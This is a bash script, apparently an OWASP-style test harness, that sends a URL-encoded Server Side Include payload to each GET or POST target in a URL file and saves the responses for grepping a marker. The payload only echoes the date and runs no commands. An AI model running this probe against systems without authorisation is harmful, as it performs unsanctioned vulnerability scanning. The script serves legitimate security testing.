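#!/bin/bash
#
# SSI injection test harness (OWASP Testing Guide style).
#
# For every line in URLFILE, sends a URL-encoded Server Side Include payload
# and saves the HTTP response body to OUTPUTDIR/curl<N>.html.  The payload is
#
#   <!--#config timefmt="UNIQUE_SSI_ID(<encoded line>)" --><!--#echo var="DATE_LOCAL" -->
#
# A server that evaluates SSI directives found in the submitted value renders
# the marker (with %Y replaced by the current year) into its response; a server
# that does not leaves the directives inert.  Afterwards, grep OUTPUTDIR for
# UNIQUE_SSI_ID: each hit identifies the request line that was evaluated,
# because the encoded line is embedded inside the marker.
#
# The PASS/FAIL lines printed per URL report only whether curl completed
# (exit 0) or failed (-f turns HTTP >= 400 into a failure); they say nothing
# about whether the payload was evaluated.
#
# Environment overrides: CURL, OUTPUTDIR, URLFILE, UNIQUE_SSI_ID.
# Requires curl and perl with URI::Escape.

# Unset variables are an error.  -e is deliberately not used: a failing curl
# is reported as FAIL and the loop continues with the next line.
set -u

CURL=${CURL:-/usr/bin/curl}

# Where do we put the responses received from the server?
# NOTE(review): output names are predictable (curl1.html, curl2.html, ...),
# so an existing file of the same name in a shared /tmp is overwritten;
# point OUTPUTDIR at a private directory when that matters.
OUTPUTDIR=${OUTPUTDIR:-/tmp}

# A file with URLs to test, one per line.
#   GET  request: http://<host>:<port>/<path>?<param>=
#   POST request: http://<host>:<port>/<path> <param>
# (a single space separates the URL from the form field name)
URLFILE=${URLFILE:-urls.txt}

# If SSI injection succeeds, a 'grep' for this string will help find it.
# %Y is an strftime conversion: a server that evaluates the injected
# "config timefmt" directive replaces it with the current year.
UNIQUE_SSI_ID=${UNIQUE_SSI_ID:-XYZZY_SSI_INJECT_%Y}

if [[ ! -r "${URLFILE}" ]]; then
  printf 'cannot read URL file: %s\n' "${URLFILE}" >&2
  exit 1
fi

typeset -i COUNTER
COUNTER=1

# read -r keeps backslashes in the line literal; the "|| [[ -n ... ]]" still
# processes a final line that lacks a trailing newline.
while IFS= read -r LINE || [[ -n "${LINE}" ]]; do
  # Skip blank lines instead of sending a request to an empty URL.
  [[ -n "${LINE}" ]] || continue

  # Get the URL and PARAMETER for POST requests.  For a GET line (no space)
  # both expansions leave LINE unchanged, so URL == LINE.
  URL=${LINE% *}
  PARAMETER=${LINE#* }

  OUTFILE="${OUTPUTDIR}/curl${COUNTER}.html"
  COUNTER=$((COUNTER + 1))

  # Safely encode the LINE such that we can SSI-inject it.
  # This will help us find the URL that is vulnerable: the encoded line
  # travels inside the marker, so a grep hit shows which request caused it.
  # printf (not echo) so that a line starting with '-' is passed through as-is.
  LINE_ENCODED=$(printf '%s\n' "${LINE}" | perl -MURI::Escape -lne 'print uri_escape($_)')

  # The SSI injection payload is:
  #
  #   <!--#config timefmt="${UNIQUE_SSI_ID}(${LINE_ENCODED})" --><!--#echo var="DATE_LOCAL" -->
  #
  # written here already URL-encoded (%3C '<', %23 '#', %20 ' ', %22 '"', %3E '>').
  INJECTION_STRING="%3C!--%23config%20timefmt=%22${UNIQUE_SSI_ID}(${LINE_ENCODED})%22%20--%3E"
  INJECTION_STRING="${INJECTION_STRING}%3C!--%23echo%20var=%22DATE_LOCAL%22%20--%3E"

  if [[ "${URL}" != "${LINE}" ]]; then
    # The line contains a space: per the URLFILE format this is a POST
    # request.  --form-string sends the value literally; plain -F would
    # treat a value starting with '@' or '<' as a file to upload.
    "${CURL}" -f -s -o "${OUTFILE}" --form-string "${PARAMETER}=${INJECTION_STRING}" "${URL}"
  else
    # No space in the line: per the URLFILE format this is a GET request,
    # and the payload is appended to the URL (which ends in "?<param>=").
    "${CURL}" -f -s -o "${OUTFILE}" "${URL}${INJECTION_STRING}"
  fi
  RETCODE=$?

  # Check to see if curl failed or the server failed (-f makes an HTTP error
  # status a non-zero curl exit code).
  if (( RETCODE != 0 )); then
    printf 'FAIL: (curl %s) %s\n' "${RETCODE}" "${LINE}"
  else
    printf 'PASS: (curl %s) %s\n' "${RETCODE}" "${LINE}"
  fi
done < "${URLFILE}"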